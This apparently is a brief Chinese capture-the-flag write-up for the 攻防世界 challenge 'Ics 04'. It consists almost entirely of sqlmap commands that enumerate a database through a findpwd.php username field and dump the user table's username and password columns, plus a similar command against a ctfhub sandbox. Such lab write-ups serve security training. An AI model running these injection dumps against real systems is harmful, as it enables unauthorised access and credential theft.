攻防世界 Ics 04

攻防世界 Ics 04
攻防世界 Ics 04_第1张图片
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=a” -D cetc004 –tables user -C “username,password” --dump
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1”
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” --dbs
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” -D cetc004 --tables
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” -D cetc004 -T user --columns
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” -D cetc004 -T user -C username&password --dump
sqlmap.py -u “http://124.126.19.106:52125/findpwd.php” --data=“username=1” -D cetc004 -T user -C username&password --dump
————————————————
sqlmap -u “http://challenge-a05b349d77b6f0fe.sandbox.ctfhub.com:10080/?id=1” --data -D sqli -T news -C “1” --dump 直接改密码

你可能感兴趣的:(攻防世界 Ics 04)